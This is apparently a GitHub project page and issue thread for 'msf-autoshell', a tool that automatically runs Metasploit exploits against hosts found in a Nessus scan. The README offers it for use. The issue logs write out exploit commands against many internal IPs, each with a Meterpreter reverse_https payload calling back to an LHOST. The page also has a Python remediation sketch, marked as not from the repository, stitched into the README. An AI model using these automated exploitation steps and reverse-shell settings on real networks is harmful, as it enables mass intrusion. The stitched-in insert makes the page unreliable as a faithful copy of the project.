
msf-autoshell's Introduction

msf-autoshell

Give it a .nessus file and it'll get you Metasploit shells. I've included the early and incomplete programs to make it easier for people who want to learn how to use the python-libnessus and msfrpc libraries.

  • msf-autoshell-boilerplate.py was the first step; a simple boilerplate program with some boring stuff filled out.
  • msf-autoshell-parse-nessus.py was the next step and all it does is parse the .nessus file and grab some info off the parsed objects.
  • msf-autoshell-msfrpc-connect.py shows how to connect to the Metasploit RPC server and some examples of interacting with it.
  • Finally, msf-autoshell.py is the complete script, containing all the Metasploit logic for running modules.
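
As an added illustration of the .nessus parsing step (not code from this repository): the sketch below uses only the Python standard library rather than python-libnessus, reads the `exploit_framework_metasploit` and `metasploit_name` fields of a .nessus v2 report, and builds a de-duplicated per-host remediation queue. The sample report, the function names and the ordering rule are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample in the .nessus v2 layout; hosts, plugins and titles are made up.
SAMPLE_NESSUS = """<NessusClientData_v2><Report name="constructed">
<ReportHost name="192.0.2.10">
  <ReportItem port="445" severity="4" pluginID="1001" pluginName="Constructed SMB finding">
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Constructed SMB module title</metasploit_name>
  </ReportItem>
  <ReportItem port="445" severity="4" pluginID="1001" pluginName="Constructed SMB finding">
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Constructed SMB module title</metasploit_name>
  </ReportItem>
  <ReportItem port="80" severity="2" pluginID="1002" pluginName="Constructed web finding"/>
</ReportHost>
<ReportHost name="192.0.2.20">
  <ReportItem port="2049" severity="3" pluginID="1003" pluginName="Constructed NFS finding">
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Constructed NFS module title</metasploit_name>
  </ReportItem>
</ReportHost>
</Report></NessusClientData_v2>"""


def exploitable_findings(nessus_xml):
    """Return sorted, de-duplicated (host, port, severity, plugin, msf_title) tuples
    for report items that Nessus flags as having a Metasploit module."""
    root = ET.fromstring(nessus_xml)  # for untrusted reports, parse with defusedxml instead
    found = set()
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            if item.findtext("exploit_framework_metasploit", "").strip().lower() != "true":
                continue
            for name in item.findall("metasploit_name"):
                found.add((host.get("name"), int(item.get("port", 0)),
                           int(item.get("severity", 0)), item.get("pluginName"),
                           (name.text or "").strip()))
    return sorted(found)


def patch_queue(findings):
    """Group findings per host and order hosts by worst severity, then finding count."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f[0]].append(f)
    return sorted(by_host.items(),
                  key=lambda kv: (-max(f[2] for f in kv[1]), -len(kv[1]), kv[0]))


if __name__ == "__main__":
    for host, items in patch_queue(exploitable_findings(SAMPLE_NESSUS)):
        print(host, "worst severity", max(f[2] for f in items))
```

Findings that Nessus does not flag with a Metasploit module are skipped, and the duplicate report item in the sample collapses into a single queue entry.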

Installation

This install is only tested on Kali.

git clone https://github.com/DanMcInerney/msf-autoshell
cd msf-autoshell
pipenv install --three
pipenv shell

In a new terminal: 
> msfconsole
msf > load msgrpc Pass=123

Usage

python msf-autoshell.py -n /path/to/nessus/file.nessus

Credits

Thanks to Coalfire for some development time.


msf-autoshell's Issues

Exploit failed: The following options failed to validate: SESSION.

Hi,

msf-autoshell looks very interesting. Thank you for that!

However, I'm running into some problems that seem related to a session validation issue. I don't know if I missed something but here's the output of what I'm getting:

--

msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus

[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - Windows ClientCopyImage Win32k Exploit
[+] Found vulnerable host! 10.0.2.146:445 - Windows TrackPopupMenu Win32k NULL Pointer Dereference
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Windows Net-NTLMv2 Reflection DCOM/RPC
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - MS14-064 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows Shell LNK Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS16-032 Secondary Logon Handle Privilege Escalation
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.2.146:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS14-060 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.143:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.106:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.224:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.224:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java AtomicReferenceArray Type Violation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player casi32 Integer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ShaderJob Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ByteArray Use After Free
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player NetConnection Type Confusion
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Drawing Fill Shader Memory Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
[+] Found vulnerable host! 10.0.1.185:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.167:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.157:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.157:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.150:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Macrovision InstallShield Update Service ActiveX Unsafe Method
[+] Found vulnerable host! 10.0.1.126:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.126:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.124:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.120:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.105:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office CVE-2017-11882
[+] Found vulnerable host! 10.0.1.90:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.86:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.72:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.71:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.58:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[*] Collecting list of all Metasploit modules...
[*] Running MSF command:
search exploit/

[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets

[*] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True

[*] Running MSF command:
exploit -z

[*] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.

[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets

[*] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True

[*] Running MSF command:
exploit -z

[*] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.

[*] Running MSF command:
use exploit/windows/local/mov_ss
show targets

[*] Setting options on exploit/windows/local/mov_ss
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True

[*] Running MSF command:
exploit -z

[*] exploit/windows/local/mov_ss output:
[-] Exploit failed: The following options failed to validate: SESSION.

[*] Running MSF command:
use exploit/windows/fileformat/office_ole_multiple_dll_hijack
show targets

Traceback (most recent call last):
  File "msf-autoshell.py", line 463, in <module>
    main()
  File "msf-autoshell.py", line 457, in main
    run_nessus_exploits(client, console_id, nes_exploits)
  File "msf-autoshell.py", line 162, in run_nessus_exploits
    module_output = run_msf_module(client, c_id, local_ip, ip, path, port, os_type)
  File "msf-autoshell.py", line 271, in run_msf_module
    cmd = create_msf_cmd(mod_path, rhost_var, ip, port, payload, target_num)
UnboundLocalError: local variable 'rhost_var' referenced before assignment
msf > sessions

Active sessions

No active sessions.

msf > jobs

Jobs

No active jobs.

NameError: name 'check_for_args' is not defined

Hi,

I just Git cloned the latest commit on 2 different systems and I'm getting the following error on both systems:

--

msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus

Traceback (most recent call last):
  File "msf-autoshell.py", line 460, in <module>
    check_for_args()
NameError: name 'check_for_args' is not defined
msf >
